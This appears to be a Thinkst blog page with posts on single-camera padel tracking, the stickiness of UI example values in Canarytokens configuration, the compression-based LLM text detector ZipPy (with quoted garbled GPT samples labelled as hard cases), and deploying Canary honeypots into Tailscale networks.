• CourtVision – Where’s my padel at?

    Labs is the research arm of Thinkst but research has always been a key part of our company culture. All Thinksters are encouraged to work with Labs on longer term projects. These become that Thinkster’s “day job” for a while. (These are intended both for individual growth, and to stretch ourselves into new areas: They don’t have to be related to Canary or security).

    I took a brief hiatus from the engineering team to explore a computer vision project: CourtVision.

    CourtVision set out to explore how to process a video stream of a racquet-and-ball game (padel: popular in the southern hemisphere and growing in popularity world-wide!) from a stationary (but unaligned) camera and extract information about the game. Padel, like other racquet sports, is played on a regulation court with lines demarcating in and out of bounds (though there are times when a ball is in play even outside of the court). CourtVision aimed firstly to extract information such as player positions and ball trajectories from a video feed, and secondly to visualise these outputs to provide insights into game tactics and strategies.

    While there are existing computer vision systems to track play in racquet games, namely the Hawk-Eye system, these require systems of multiple fixed, calibrated, and synchronised cameras. The CourtVision challenge was to offer similar outputs from a single viewpoint that need not be in a specific location relative to the court.

    The problem formulation

    The problem can be thought of as unwinding the events that gave rise to the video. To achieve this we draw on prior knowledge such as the court layout and ball and player dynamics. At each moment during a game the light emanating from the scene is sampled (at 30 fps), producing a sequence of images.

    The problem now is to associate certain pixels in each image with the objects in the scene we would like to know more about, and then to estimate the object positions that best explain the sensor readings (the image sequence).

    Starting from here, a number of avenues were explored; below is a linearised path of how we went about solving this problem.

    The path is simple (looking back):

    1.  Establish a mapping from world coordinates to image plane pixel locations.
    2.  Detect objects of interest (players and ball) in each frame.
    3.  Estimate the world coordinates of each object by leveraging the inverse mapping found in Part 1.

    Establishing a mapping between world coordinates and the image plane is a well-understood problem, and implementations exist in commonly used computer vision libraries. The twist in our case is doing it from a single image. Taking inspiration from [3], where the net on a tennis court was used to form an additional plane, we took orthogonal planes from the court structure and jointly estimated the camera pose and intrinsic matrices. This is explained in Part 1 of the blog below.

    In Part 2 we expand on how we leveraged existing computer vision models to detect objects of interest in each frame. 

    Previous works that attempted 3D tracking from a single camera relied on either knowing the size of the object being tracked [1] (and that its projected size is invariant to the viewing angle, i.e. spherical objects), or assuming the object of interest follows purely ballistic trajectories [2]. Here, we modeled the ball trajectory as ballistic but retained a multimodal distribution over the ball’s states in a particle filter, allowing the tracker to quickly adapt to new trajectories (modes) without explicitly modeling the interaction with walls, floor and racquet. Part 3 illustrates this approach.

    We made the following assumptions: 

    1. The camera is stationary (but does not need to be in a specific location).
    2. Court dimensions are known.
    3. Players’ feet remain on the ground.

    Part 3 illustrates limitations in our tracker; by making assumption 3 we could improve player tracking stability.

    Figure 1: The experimental setup showing a broadcast camera view (resized) and a schematic of the padel court dimensions in [mm].

    Part 1: Camera calibration and pose estimation

    Extracting real-world measurements from a camera requires knowing both the extrinsics (position and pose) and the intrinsics (such as focal length and distortion coefficients) of the camera. Once these are known we can map any point in the world coordinate frame to a pixel location in the image. We can also project rays into the world coordinate system from a desired pixel location.
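    Once intrinsics and extrinsics are known, the forward mapping is the standard pinhole camera model; a minimal numpy sketch with an invented camera (the intrinsics and pose below are illustrative, not the values from our setup):

```python
import numpy as np

def project_to_image(point_world, K, R, t):
    """Project a 3D world point into pixel coordinates with a pinhole model."""
    p_cam = R @ point_world + t   # world frame -> camera frame
    p_img = K @ p_cam             # camera frame -> homogeneous image coords
    return p_img[:2] / p_img[2]   # perspective divide -> (u, v) pixels

# Toy setup: camera 10 m back from the origin, looking down the world z-axis.
K = np.array([[1000.0, 0.0, 960.0],   # fx, skew, cx (for a 1920x1080 image)
              [0.0, 1000.0, 540.0],   # fy, cy
              [0.0, 0.0, 1.0]])
R = np.eye(3)                         # no rotation in this toy example
t = np.array([0.0, 0.0, 10.0])        # translation in metres

uv = project_to_image(np.array([0.0, 0.0, 0.0]), K, R, t)
# A point on the optical axis lands at the principal point: (960, 540).
```

Projecting a ray into the world from a pixel is the same chain of operations run in reverse (invert K, then rotate the ray back into the world frame).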

    Figure 2: An annotated frame showing three of the eight planes used to perform single image calibration. The additional planes not visualised here are the side, front and back walls and a horizontal plane at the height of the glass.

    The trade-off made for not having to collect data first-hand is that little is known about the setup: in this case the camera intrinsics and extrinsics were unknown. The common approach to determining camera intrinsics is to capture a calibration sequence, often of a checkerboard pattern. Since we didn’t have that luxury, we exploited the structure in the scene and defined a set of planes for which image plane and world coordinate correspondences could be identified. By doing this we effectively introduced a set of eight planes (similar to a checkerboard) and performed camera calibration from them. The mean reprojection error was approximately 9 pixels on 1080 x 1920 images.
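    Each such plane contributes world-to-image correspondences, from which a plane-to-image homography can be fitted with the standard direct linear transform (DLT); a minimal numpy sketch of the idea (the pixel coordinates below are invented for illustration, not measured from our footage):

```python
import numpy as np

def fit_homography(world_xy, pixels):
    """DLT: fit the 3x3 homography mapping plane points -> pixels (>= 4 pairs)."""
    rows = []
    for (X, Y), (u, v) in zip(world_xy, pixels):
        rows.append([X, Y, 1, 0, 0, 0, -u * X, -u * Y, -u])
        rows.append([0, 0, 0, X, Y, 1, -v * X, -v * Y, -v])
    # The homography is the null vector of the stacked constraint matrix.
    _, _, Vt = np.linalg.svd(np.asarray(rows, dtype=float))
    return Vt[-1].reshape(3, 3)

def apply_homography(H, X, Y):
    u, v, w = H @ np.array([X, Y, 1.0])
    return u / w, v / w

# Hypothetical correspondences: four floor corners of a 10 m x 20 m court
# "clicked" in the image.
world = [(0, 0), (10, 0), (10, 20), (0, 20)]
pixel = [(310, 880), (1620, 860), (1400, 300), (500, 310)]
H = fit_homography(world, pixel)

u, v = apply_homography(H, 0, 0)   # round-trips the first corner: (310, 880)
```

With several planes, the per-plane homographies jointly constrain the shared intrinsics and the camera pose, which is what the eight-plane calibration exploits.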

    Part 2: Bootstrapping custom object detectors

    There is a plethora of off-the-shelf models that can do object detection; however, none has a single-class “padel ball” detector. Fine-tuning such a model is fairly common, and to do so a few annotated frames were needed. LabelStudio is a very versatile data labeling tool that makes it easy to “put a model in the loop”. By doing this we bootstrapped our ball detector: we repeatedly annotated more images, each time using the latest model to automatically label additional images which were then manually verified and corrected.

    Figure 3: The cycle of labelling data, training an object detection model, manually labelling more data assisted by the latest model’s predictions, and retraining.

    Part 3: Bringing image detections to the real world

    Detections on the image plane tell us nothing about the players’ and ball’s positions in the real world. To estimate these positions we define a state for each player and the ball, and then update this state based on the detections. To govern this process in a principled manner we used a Bayesian filter, in particular a particle filter.

    A particle filter maintains a distribution over the state of each object, stored as a set of state vectors each with an associated weight indicating probability mass. To illustrate this, the top image in figure 4 shows the cloud of particles representing the state of the ball. During the filter’s update step we follow Bayes’ rule to update the weight of each particle based on how well it explains the observation (the image). As we can see, the core of the particle cloud is around the ray emanating from the detected ball position in the image. All particles along that ray “explain” the observation equally well; the information held in the current state (the prior) ensures the updated state does not naively squash all particles onto the ray. Bayesian filters like this are a great way to encode the knowledge we have about the ball’s dynamics and current state, and to update this belief as we get more observations.

    Figure 4: Top: showing the internal state of the ball tracker. Each particle representing an amount of “probability mass” over the position of the ball. Bottom: The yellow square is the ball detector’s output. The yellow dot is the weighted mean estimate of the ball position projected into the image plane.
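    The update step can be sketched in a few lines of numpy. This is an illustrative reimplementation of the idea, not our tracker: the Gaussian likelihood on ray distance and the sigma value are assumptions made for the sketch:

```python
import numpy as np

def update_weights(particles, weights, cam_origin, ray_dir, sigma=0.1):
    """Bayes update: reweight particles by how well they explain the
    observation, modelled as a ray from the camera through the detection."""
    ray_dir = ray_dir / np.linalg.norm(ray_dir)
    rel = particles - cam_origin
    # Perpendicular distance of each particle from the observation ray.
    along = rel @ ray_dir
    perp = rel - np.outer(along, ray_dir)
    d = np.linalg.norm(perp, axis=1)
    likelihood = np.exp(-0.5 * (d / sigma) ** 2)   # assumed Gaussian model
    weights = weights * likelihood
    return weights / weights.sum()                 # renormalise the posterior

rng = np.random.default_rng(0)
particles = rng.normal([0.0, 0.0, 5.0], 1.0, size=(500, 3))  # prior cloud
weights = np.full(500, 1 / 500)

# Detection ray from a camera at the origin, pointing along the z-axis.
w = update_weights(particles, weights, np.zeros(3), np.array([0.0, 0.0, 1.0]))
# Particles near the ray now carry most of the probability mass.
```

Note that every particle along the ray keeps a similar likelihood; it is the prior spread of the cloud along the ray that keeps depth information alive.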

    But we don’t just want a fuzzy cloud around where the tracker “thinks” the ball is; we want the best estimate of the ball’s position. Once again we consult our probability distribution over ball states, from which we can extract any statistic we want: the particle with the largest weight (the argmax), or the weighted mean over all states. Below is the weighted mean position of the ball.

    Figure 5: Top: Shows the weighted mean ball position. Bottom: The reprojected mean estimate of the ball in the image plane.

    This approach showed promising results, but we did see the tracker fail after a few missed detections, resulting in mode collapse: the distribution over the ball’s state (the cloud of particles, as in figure 4) either dispersed or reduced to a point. Particle filters come in a number of flavors and we only implemented the simplest resampling methods, so it might be a bug there or just a naive choice somewhere. Ah, research, so many avenues to explore!

    To constrain player tracking to a plane we called on assumption 3 from above and projected the detection ray to intersect with the ground plane. These results are shown below as heatmaps of player positions and velocities. Tracking under this constraint means a detected player (the measurement) can be projected onto the ground plane (the tracker state) with no information loss (3D to 2D), and our tracker remains performant.
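    Under assumption 3 the projection is a one-line ray-plane intersection; a short sketch (the camera position and ray here are invented for illustration):

```python
import numpy as np

def intersect_ground(cam_origin, ray_dir, ground_z=0.0):
    """Intersect a detection ray with the ground plane z = ground_z.
    Valid because we assume the player's feet touch the ground."""
    s = (ground_z - cam_origin[2]) / ray_dir[2]   # ray parameter at the plane
    return cam_origin + s * ray_dir

cam = np.array([0.0, -15.0, 6.0])   # camera 6 m up, behind the court
ray = np.array([0.0, 2.0, -1.0])    # ray through a detected player's feet
foot = intersect_ground(cam, ray)
# foot = (0, -3, 0): a unique point on the court floor, no depth ambiguity.
```

This is why the player tracker is so much more stable than the ball tracker: the measurement pins down the state exactly instead of only constraining it to a ray.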


    Figure 6: Top: heatmaps of position (left) and velocity (right) of the players. The team on the left side of the court is in the foreground in the bottom image.

    The ultimate goal of such a system is to provide insights into game play and strategies. To this end we show court occupation and player movement speeds: the position and velocity heatmaps of players during a rally. The bottom image has Team A in the foreground and Team B in the background. Here we can see where players were during the rally as well as how they moved: Team A (on the left) plays from deep, while Team B (on the right) occupies the mid-court far more. Translating this raw positional information into actionable insights remains future work.

    Going from a set of hypotheses to evaluating them is a fun technical challenge and my time in Thinkst Labs was great. I still hope to bring this to a court sometime soon and test the final assumption: seeing game play metrics can improve tactics. 


    Below is a collection of tools this project found useful, as well as outputs from this work.


    [1] 3D Ball Localization From A Single Calibrated Image

    [2] MonoTrack: Shuttle trajectory reconstruction from monocular badminton video

    [3] Generic 3-D Modeling for Content Analysis of Court-Net Sports

  • Default behaviour sticks (And so do examples)


    We spend huge amounts of time sweating the details of our products. We want to remove all the friction we can from using them and want to make sure we never leave our users confused. To get this right, we do a bunch of things: we use simple language, we make extensive use of context-sensitive help and where it’s needed, we nudge users with illustrative examples.

    Recently we bumped into something that made us rethink our use of examples.


    Paid Canary customers also receive a private Canarytokens server as part of their subscription. This is a private, managed version of the service publicly available at www.canarytokens.org. They get to mint an unlimited number of Canarytokens, get access to some tokens before they are released to the world and are able to trivially customise the service.

    Canarytokens typically (but not always) rely on a DNS zone that’s unique per-customer. When a customer signs up, we create a DNS zone for them and usually that’s sufficient for their needs.

    However, one of the advanced customisations for customers is the ability to create their own DNS zone with a name they pick. They’d typically do this to make the underlying hostname obviously tied to their company, so their custom DNS zone might look like assets.their-company.com. This requires users to pick a zone name, and as a UX guide we autogenerated a name for them. We happily used someprefix.their-company.com 1 as an example:

    When we built the UI for this feature, the someprefix example was included to make it easier for customers to configure DNS on their end, given that DNS can be tricky to get right. It was never the intention that customers only use a zone called someprefix; we simply picked it because we needed something to use in our examples. If the example zone name becomes an implicit standard, the risk is that it lets attackers more confidently guess at Canarytokens based on discovered hostnames.

    Recently, one of our engineers was working in this area of code and wondered how many customers simply followed the example shown and picked someprefix.their-company.com as their custom domain of choice, as opposed to choosing another. His intuition was spot on. Among customers using this feature, ~40% used the example we provided:

    We use the custom domain to make Canarytokens less identifiable. If 40% of them use the same custom name, then the disguise is not as effective.


    To be sure, this is not an individual customer problem. Looking at other configuration options present in our UI, the pattern is clear: when given an example, a significant number of users default to using that same example in their customisation. The behaviour is consistent across customers and configurations. This surprised us! 2

    It’s important to realise this isn’t a customer-side issue; they shouldn’t have to consider the impact of every configuration option we choose to put in front of them. They don’t have the full context and knowledge, and expecting them to be experts in the nitty gritty of Canarytoken discoverability makes no sense. Frankly it’s a reason enterprise software is often so terrible; tons of options you barely understand or know about, and are configured according to tutorials/examples rather than understanding. This is a lesson for us internally about how we guide customers through using Canarytokens, and more generally through Canary.

    Fortunately this particular case has a simple enough fix. Going forward, we will show multiple examples of prefixes. A user looking to add a custom domain will see a variety of example zones when they visit the page, and the examples will cycle each time they open the configuration page. We want to convey that they have options in choosing the name, and we show them a variety of sample options. Our hope is that this will prompt customers to pick their own names, and if they do rely on our examples then those are now spread over a large list of examples.
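    The mechanics are simple; a sketch of what cycling examples could look like (the prefix list and function names here are invented for illustration, not our actual implementation):

```python
import random

# Hypothetical pool of example prefixes; the UI draws a fresh subset on each
# page load, so no single example can become the de facto default.
EXAMPLE_PREFIXES = [
    "assets", "static", "cdn", "files", "media",
    "content", "resources", "img", "docs", "dl",
]

def example_zones(company_domain, k=3):
    """Return k distinct example zone names for display in the UI."""
    prefixes = random.sample(EXAMPLE_PREFIXES, k)
    return [f"{p}.{company_domain}" for p in prefixes]

zones = example_zones("their-company.com")
```

Even if users still copy what they see, the copies are now spread across the whole pool rather than concentrated on one guessable name.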


    The outsized impact of what seemed like a very minor placeholder choice made years ago helped us reevaluate how we select the examples we show customers. It’s a strong reminder to sweat every small detail in the UI; we were genuinely surprised by how strongly our examples stuck.

    Going forward, this particular placeholder has been altered and the change is already live for customers. We will report back with a count once the new examples have been active for a while.

    1. some-prefix is used in this post to protect our poorly chosen actual-prefix 🙄 ↩︎
    2. It’s likely this result is known in UI design circles, but was new to us. Please send references to other work!
  • Meet “ZipPy”, a fast AI LLM text detector


    Today we’re open-sourcing a research project from Labs: ZipPy, a very fast LLM text detection tool. Unless you’ve been living under a rock (without cellphone coverage), you’ve heard how generative AI large language models (LLMs) are the “next big thing”. Hardly a day goes by without a breathless article on how LLMs are either going to remake humanity or bring upon its demise; this post is neither. While we think there are some neat applications for LLMs, we doubt they’re the end of work or humanity. LLMs do provide the ability to scale natural language tasks, for good or ill. It is when that force-multiplier is used for ill, or without attribution, that it becomes a concern, as is already showing up in disinformation campaigns, cheating in academic environments, and automated phishing; detecting LLM-generated text is an important tool in managing the downsides.

    There are a few LLM text classifiers available: the open-source Roberta-base-openai-detector model, GPTZero, and OpenAI’s detector. All of these have shortcomings: they are large models trained on large datasets, and the latter two are commercial offerings with little information on how they operate or perform. ZipPy is a fully open-source detector that is small enough to be embedded in any number of places, enabling detection “on the edge”.

    TL;DR: ZipPy is a simple (< 200 LoC of Python), open-source (MIT license), and fast (~50x faster than Roberta) LLM detection tool that can perform very well depending on the type of text. At its core, ZipPy uses LZMA compression ratios to measure the novelty/perplexity of input samples against a small (< 100KiB) corpus of AI-generated text, a corpus that can be easily tuned to a specific type of input classification (e.g., news stories, essays, poems, scientific writing, etc.).

    We should note that no detection system is 100% accurate, ZipPy included, and it should not be used to make high-consequence determinations without corroborating data.


    Generative AI and LLMs

    LLMs are statistical machine learning (ML) models with millions or billions of parameters, trained on many gigabytes or terabytes of input. From that immense volume of data, during the training phase the model builds a probability weighting for all tokens or words given the preceding context. For example, if you were to read the contents of the entire web, the sentence “The quick brown fox jumps over the lazy dog” would appear [relatively] frequently. Given the context “The quick brown”, the most probable next word is learned to be “fox”. LLMs have to be trained on large datasets in order to attain the “magical” level of text understanding, and this requirement leads to our detection strategy.

    Intuitively, every person has a unique vocabulary, style, and voice: we each learned to communicate from different people, read different books, had different educations. An LLM, by comparison, has the most probable (average) style, having been trained on close to the entire internet. This nuance is how LLM classifiers work: text written by a specific human will be more unique than the LLM’s modeled average human writer. The detectors listed above work by either explicitly or implicitly (through training on both human and LLM datasets) trying to determine how unique a text is. There are two common metrics: perplexity and burstiness.

    Perplexity is a measure of the surprise encountered when reading a text. Imagine you had read the entire internet and knew the probability tables for each word given the preceding context. Given “The quick brown” as context, and the word “fox”, there would be low perplexity, as the chance of seeing “fox” come next is high. If the word was instead “slug”, there would be a large difference between expectation and reality, so the perplexity would increase. The challenge with calculating perplexity is that you have to have a model of all language in order to quantify the probability of the text. For this reason, the existing detectors use large models trained either on the same training data as is used to train the LLM generators, or on datasets of both human- and LLM-generated texts.

    Burstiness is a calculation of sentence lengths and how they change throughout a text. Again, an LLM will generally migrate towards the mean, so lengths will be closer to the average, with human-written text having more variance in sentence length. This is easier to calculate, but more impacted by the type of text: some poems have little to no punctuation, whereas others have a number of highly uniform stanzas; news briefs are commonly punchier; and academic papers (and blogs about burstiness) can have extremely long sentences.

    Both of these metrics are affected by the temperature parameter, which an LLM uses to determine how much randomness to include in generation. Higher temperatures produce more perplexing and bursty text, but run the risk of being nonsensical to a human reader. If a human author writing a summary of a local slug race captions a picture “The quick brown slug, Sluggy (left), took home the gold last Thursday”, it makes sense. LLMs don’t understand the world or what they are writing, so if the temperature were set high enough to output “The quick brown slug”, the rest of the text would likely be nonsensical.


    Compression is the act of taking data and making it smaller, with a matched decompression function that returns the compressed data to [close to] the original input. Lossless compression (e.g., .ZIP files) ensures that the data post compression and decompression is the same as the original input; lossy compression (e.g., .JPG or .MP3 files) may make minor adjustments for better compression ratios. Compression ratios are a measure of how much smaller the compressed data is than the original input. For the remainder of this blog post we’ll just be discussing lossless compression.

    Compression generally works by finding commonly repeated sequences and building a lookup table or dictionary. A file consisting of all one character would compress very highly, whereas truly random data would compress poorly. Each compression algorithm may have a different scheme for choosing which sequences to add to the table, and for efficiently storing that table, but generally they work on the same principles.
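    The effect is easy to demonstrate with Python’s standard lzma module (this is our illustration of the principle, not code from any particular compressor):

```python
import lzma
import os

def ratio(data: bytes) -> float:
    """Compressed size / original size; lower means more redundancy found."""
    return len(lzma.compress(data)) / len(data)

repetitive = b"a" * 10_000     # maximally redundant input
random_ish = os.urandom(10_000)  # no structure to exploit

r_rep = ratio(repetitive)   # tiny: the repeated symbol compresses away
r_rnd = ratio(random_ish)   # near (or even above) 1: incompressible
```

Random data can actually come out slightly larger than the input, since the compressed stream carries its own header and dictionary overhead.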

    Compression was used in the past as a simple anomaly detection system: by feeding network event logs to a compression algorithm and measuring the resultant compression ratio, the novelty (or anomaly) of the input could be determined. If the input changes drastically, the compression ratio will decrease, alerting to anomalies, whereas more of the same background event traffic will compress well having already been included in the dictionary.


    ZipPy is a research tool that uses compression to estimate the perplexity of an input. With this estimate, it is possible to classify a text’s source in a very efficient manner. Similar to the network event anomaly model, ZipPy looks for anomalies in the input when compared to a [relatively] large initial corpus of AI-generated text. If the compression ratio improves when the sample is appended, the perplexity is low, as there are existing dictionary entries for much of the sample, whereas a high-perplexity input would worsen the ratio.

    ZipPy starts with a body of text, all generated by LLMs (GPT, ChatGPT, Bard, and Bing), and compresses it with the LZMA compression algorithm (the same as in .ZIP files), calculating ratio = compressed_size / original_size. The input sample is then appended to the LLM-generated corpus and compressed again, with the new ratio computed the same way. If appending the sample improves the compression ratio, the sample is likely to be LLM-generated; if the compression ratio increases, the sample has higher perplexity and is more likely human-generated.
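    A minimal sketch of this scoring scheme using Python’s standard lzma module (the toy corpus and samples are invented; they stand in for ZipPy’s ~100 KiB corpus of real LLM output):

```python
import lzma

def compression_ratio(text: str) -> float:
    data = text.encode()
    return len(lzma.compress(data)) / len(data)

def score(sample: str, llm_corpus: str) -> float:
    """Positive: sample compresses well against the LLM corpus (low
    perplexity, AI-like). Negative: sample is novel (human-like)."""
    base = compression_ratio(llm_corpus)
    combined = compression_ratio(llm_corpus + " " + sample)
    return base - combined

# Toy corpus standing in for the AI-generated "training" text.
corpus = "The quick brown fox jumps over the lazy dog. " * 50
ai_like = "The quick brown fox jumps over the lazy dog."
novel = "Sluggy the racing slug zoomed past startled spectators!"

# ai_like repeats corpus phrasing, so it scores higher than novel.
```

Because the corpus is just a text file, retargeting the detector to a new domain is a matter of swapping in LLM output of that domain.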

    At its core, that’s it! However, as part of our research, there are a number of questions we’ve been exploring:

    • How does the compression algorithm change the performance?
      • What about compression presets (which improve compression but are slower)
    • What is the optimal size and makeup of the initial body of AI-generated text?
      • Should the samples be split into smaller pieces?
      • Is there a minimum length of sample that can impact the overall ratio enough to get good data?
    • How should formatting be handled? An early test on a human sample failed because each line was indented with 8 spaces (which compressed well).

    We don’t have all the answers yet, but our initial findings are promising!


    In order to test how well ZipPy performs, we needed datasets of both human and LLM text. In addition to using ChatGPT, Bard, and Bing to generate ~100 new samples to test, we explored the following datasets:

    OpenAI’s GPT-3 dataset

    OpenAI’s GPT-2 dataset (webtext and xl-1542M)

    MASC 500k (excluding the email and twitter collections)

    GPT-2-generated academic abstracts

    News articles re-written by ChatGPT

    CHEAT (ChatGPT-generated academic abstracts)

    ZipPy performs best on datasets that are in English (all of the AI-generated “training” text being English-language) and that are written as sensical prose. Two of the datasets we evaluated, the GPT-2 and GPT-3 outputs, were created without prompts to guide the output. ZipPy performs poorly on these, as the output is either poor (difficult for a human to understand) and/or extremely diverse (multiple languages, code, and odd formatting). A few examples from these datasets are provided below to give a sense of the data that is difficult for ZipPy to classify:

    layout_container:Genotion 2 – HD select

    Focus: Batsu

    Most more much HD contains information about is one of the best addon…read more Posts: 7

    Check out more from Christina at: stock666.com Posted by:| September 03, 2018 06:36 AM design3D 2-3-3-3 … Posted by:| September 03, 2018 06:05 AM hiszog 2-3-3-3 … Posted by:| September 03, 2018 05:27 AM too amateur. At boot it says DLL missing. Posted by:| September 03, 2018 04:12 AM likes2eat 4-3-3-3 Early Review andenjoy! Posted by:| September 03, 2018 05:54 AM AutoVR 2-3-3-3 Built Dutch : O Posted by:| September 03, 2018 05:30 AM looks like it will get more popular : o Posted by:| September 03, 2018 02:10 AM Cross Fitness 3.0 Part 1 by CrossFit up

    OpenAI GPT-2 sample #1

    Convocainftvalerie 20

    13.9” L Y


    With Screen Case

    Material: Acetate

    Auction Location:

    10360 W. San Ramon Fairgrounds, Sonoma, California, 94950, United States


    Buyer’s Premiums: From (Incl.) To (Excl.) Premium 0.00 Infinite 20%

    Shipping Details:

    There if be 3 Methods to Buy from the Big T: (1) eTailer, Ebay or other Auction Sites, or (2) Ebay (convention). This Year Auction Will be Conducted on Ebay.com

    OpenAI GPT-2 sample #2

    1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399…1280

    OpenAI GPT-3 sample #1

    Někdy mi začne zazvonit v telefonu život, protože to vůbec není telefon, ale sekundární vlna, kterou jsem přivolala k sobě.

    Dnes mi to začalo zazvonit už po desáté, mám ráda pravidelnost, abych se v ní vyznala, a začala se pohybovat rychleji.

    Ne, nemůžete se najít v mém životě, ale nemusíte také.

    Protože se mi začne zazvonit, pořád stejně krásně, v okamžiku, když to přijde.

    A je to pro vás taky tak nějak to pravé.

    -Nekončí se už zase?- zaslechla jsem vyslovené základní já, a snažila jsem se mu na to odpovědět.

    Nemáte moc důvodů mě zastrašovat, nebo mi přerušovat. Vy jste větší zvíře. Můžete si mě zavolat, když vám bude zase chybět něco vážnějšího. Nechcete to zas vyhodit, jako každého docela rozumného a slušného kluka, nebo jak jejich říkáte.


    OpenAI GPT-3 sample #2

    With a subset of at most 500 samples per included dataset, we ran just under 5000 documents through ZipPy (2m14s), OpenAI’s detector (29m22s), Roberta (1h36m17s), and GPTZero (1h1m39s). From this data we construct a ROC curve for each. ROC curves show both the accuracy (area under the curve, or AUC) and the sensitivity at different decision thresholds. All the detectors provide a confidence score that a sample is either AI- or human-generated; if the threshold for the decision boundary is adjusted, the detector may catch more true positives, but at the expense of more false positives.
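    The AUC these curves summarise can be computed directly from detector scores via the rank-sum identity; a small sketch with invented scores (higher score meaning “more likely AI”):

```python
def roc_auc(scores_human, scores_ai):
    """AUC via the rank-sum identity: the probability that a randomly chosen
    AI sample scores higher than a randomly chosen human sample."""
    wins = sum(a > h for a in scores_ai for h in scores_human)
    ties = sum(a == h for a in scores_ai for h in scores_human)
    return (wins + 0.5 * ties) / (len(scores_ai) * len(scores_human))

# Invented detector scores, purely for illustration.
human_scores = [0.1, 0.2, 0.35, 0.4, 0.6]
ai_scores = [0.3, 0.55, 0.7, 0.8, 0.9]

auc = roc_auc(human_scores, ai_scores)   # 0.84; 1.0 would be perfect
```

An AUC of 0.5 is coin-flip performance, which is why the 62% figures below are so damning for the commercial detectors.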

    If the un-prompted datasets are excluded, the performance of the detectors gives the following ROC curve, with LZMA being the curve for ZipPy:

    ROC curve excluding un-prompted GPT-2 and GPT-3 output

    In simple terms, this curve shows that ZipPy correctly classifies the origin of an input 82% of the time, whereas Roberta has 80% accuracy, and both GPTZero and OpenAI sit at only 62% accurate. Adding the GPT-3 samples back in (without adding any new samples to the “training” file), the performance drops for ZipPy, and slightly improves for Roberta, which was trained on GPT datasets:

    ROC curve excluding only un-prompted GPT-2

    This shows that ZipPy’s compression-based approach can be accurate, but is much more sensitive to the type of input than Roberta. As ZipPy is more of an anomaly detector than a trained model, it cannot differentiate novel types of input as well as the larger models. It does appear able to handle the different types of data that have been added to the training file (the same data is used for news, essays, abstracts, forum posts, etc.), but not completely differently formatted texts or those not in the same language as the training data. Additionally, due to the simple implementation, it is comparatively easy to customize ZipPy for a specific set of inputs: simply replace the training file with LLM-generated inputs that more closely match the type of data to be detected.

    It is interesting to see how poor the performance is from both OpenAI’s and GPTZero’s detectors, given that they are the commercial, closed-source options. That OpenAI’s detector should perform so poorly on datasets to which they presumably have easy access is curious; hopefully as they improve their models, their performance will catch up with the open-source Roberta model.


    In conclusion, we think that ZipPy can add utility to workflows handling data of unknown origin. Due to its size, speed, and tunability, it can be embedded into a host of places where a 1.5B parameter model (Roberta) couldn’t. In the GitHub repository are: a Python 3 implementation of ZipPy, a Nim implementation that compiles to both a binary and a web-based detector, all of the data tested on, and harnesses for testing ZipPy and the other detectors.

    As a cute example of how this could be used, we also include a browser extension that uses ZipPy in a web worker to set the opacity of web text to the confidence that it is human-written. While there is too much diversity in the style of text in an average day’s browsing session for this to be reliable, it demonstrates a proof-of-concept for filtering out the LLM-generated noise.

    We are still actively exploring this idea, and would love feedback or thoughts. If you’d like to collaborate with us, or have something you’d like to share, please reach out to research@thinkst.com.

  • Birds at (Tail)scale

    This week we are super excited to release the latest addition to our lineup of Thinkst Canary platforms: Tailscale.


    We’ve always made sure that deploying Canaries is absurdly quick and painless. It’s why you can add a hardware Canary to your network just by plugging it in and why most customers end up re-thinking their detection roadmaps:


    We adore Tailscale: They have a first-rate team and their product is also widely loved for being startlingly simple to deploy. For this reason alone, we needed to consider a Tailscale Canary. But first, what is Tailscale?


    Tailscale is a mesh VPN to run your own secure network. Think: I want all my endpoints to talk to each other on a secure network wherever they are in the world without worrying about eavesdropping. (They happen to do this with amazingly little configuration, across enough platforms to make your head spin). Like Canary, “it just works”.

    (Really) Why a Tailscale Canary?

    As Tailscale grows (and we think it will) you will see logical networks being set up and used regardless of the configuration (or location) of the physical networks beneath them. The Tailscale admin gets to create policies that allow a developer machine access to staging, or to prod, through simple Tailscale routing rules.

    What will attacker lateral movement look like in a world like that?

    An attacker who compromises user-A effectively becomes user-A, and views the world from their perspective. (As always) They are able to pivot to machines on user-A’s local network, but they also have access to hosts on user-A’s Tailnet. This is where Canaries shine. Attackers probing for other hosts on the Tailnet deserve to bump into Canaries as much as attackers exploring your cloud environments do. If only we could make deployment quick and painless.

    Ed: they totally can.

    Deploying a Canary into your Tailnet is (unsurprisingly) shockingly easy. 

    Head over to your Console and select the [+] icon to add a Canary. Then head over to the “Tailscale (beta)” block and select “Add Tailscale Canary”.

    Enter an ephemeral Tailscale auth key and hit Launch. That’s it!

    A Canary boots and is added to your Console (and your Tailnet). 

    You can configure the Canary just like any of its cousins (and you can use your Tailscale config to make sure the Canary never sends traffic to other hosts on your Tailnet for added security).

    In the background we spin up an AWS environment per customer, drop a Canary into it and the bird joins your Tailnet. The AWS environment consists of a VPC and a private subnet in which the Canary lives. The Tailscale auth key is a single use tagged key such that the Canary joins with predefined ACLs that you control.

    What this gives you is a Canary in your inner circle. Here we configured the Canary called DataStore with a Windows file share and RDP. Nmap-ing shows it as a Windows machine with the corresponding service ports open.

